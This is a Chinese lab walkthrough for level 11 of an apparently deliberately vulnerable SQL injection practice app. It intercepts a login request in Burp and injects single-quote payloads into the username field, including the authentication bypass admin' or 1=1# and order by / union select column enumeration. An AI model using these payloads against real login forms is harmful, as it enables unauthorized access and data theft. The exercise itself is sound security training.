第十一关(Less-11):单引号注入
1.首先输入用户名和密码均为admin进行登录,显示登录成功和相关的sql语句以及登录名和密码,如图所示
2.打开Burp Loader进行抓包分析,打开代理,重新登录,进行抓包
3.将uname、passwd和submit进行复制,粘贴到如图所示位置,然后执行
4.执行之后,显示成功。
5.将uname=admin&passwd=admin&submit=Submit修改为uname=admin'&passwd=admin&submit=Submit,再次执行,如图出现语法错误,说明存在注入漏洞
6.将 uname=admin'&passwd=admin&submit=Submit更改为uname='&passwd=admin&submit=Submit,再次执行,如图还是存在错误,存在注入漏洞
7. 将uname='&passwd=admin&submit=Submit更改为uname=admin' or 1=1#&passwd=admin&submit=Submit,登录成功,验证存在注入漏洞(#为注释符,不可用--+)
8.输入uname=n'or 1=1#&passwd=admin&submit=Submit,执行显示成功,则构造出初始语法为这样儿
9.使用order by猜解列数,输入uname=n'order by 3#&passwd=admin&submit=Submit,显示错误
10.将3改为2,无错误,说明有两列
11.使用联合查询语句union select,得出回显位置1和2